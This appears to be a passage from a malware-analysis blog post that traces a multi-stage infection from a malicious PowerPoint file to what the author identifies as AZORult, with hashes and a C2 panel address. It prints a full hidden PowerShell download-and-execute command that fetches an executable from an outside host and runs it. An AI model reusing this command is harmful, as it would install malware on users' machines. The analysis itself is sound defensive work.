Analysing the Microsoft Powerpoint structure it rises on my eyes the following slide structure
|Stage 1: Microsoft PowerPoint Dropping Website|
An external OLEobject (compatibility 2006) was available on that value:
Decoding that string from HEX to ASCII is much more readable:
Decoding the 3.6K script appears clear that one more Stage is involved in the infection process. The following code is the execution path that drives Stage 2 to Stage 3.
var run = new ActiveXObject(‘WSCRIPT.Shell’).Run(powershell -nologo -executionpolicy bypass -noninteractive -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile(‘http://batteryenhancer.com/oldsite/Videos/js/DAZZI.exe’, ‘%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe’); Start-Process ‘%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe’ );
The script downloads a file named: AZZI.exe and saves it by a new name: VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe on a System temporary directory for running it. The downloaded PE Executable is a .NET file created by ExtendedScript Toolkit (according to compilation time) on 2018-11-13 15:21:54 and submitted few hours later on VirusTotal.
|Stage 3: .NET file|
The Third stage uses an internal resource (which happens to be an image) to read and execute additional code: the final payload or Stage 4. In other words Stage 3 reads an image placed under the internal resource of PE File, extracts and executes it. The final payload looks like AzoRult Malware. The evidence comes from traffic analysis where the identified pattern sends (http POST) data on browser history and specific crafted files under User – AppData to specific php pages. Moreover the Command and control admin panel (hxxps://ominigrind.ml/azzi/panel/admin.php) looks like AZOrultV3.
I hope you had fun on this, I did! It was super interesting to see Attacker’s creativity and the way the act to include malicious contents into Office Documents. Microsoft should probably take care of this and try to filter or to ask permissions before include external contents, but still this will not be a complete solution (on my personal point of view). A more deep and invasive action would be needed to check the remote content. Stay tuned!
Original Powerpoint: 6ae5583ec767b7ed16aaa45068a1239a827a6dae95387d5d147c58c7c5f71457
Resource Img: 965b74e02b60c44d75591a9e71c94e88365619fe1f82208c40be518865a819da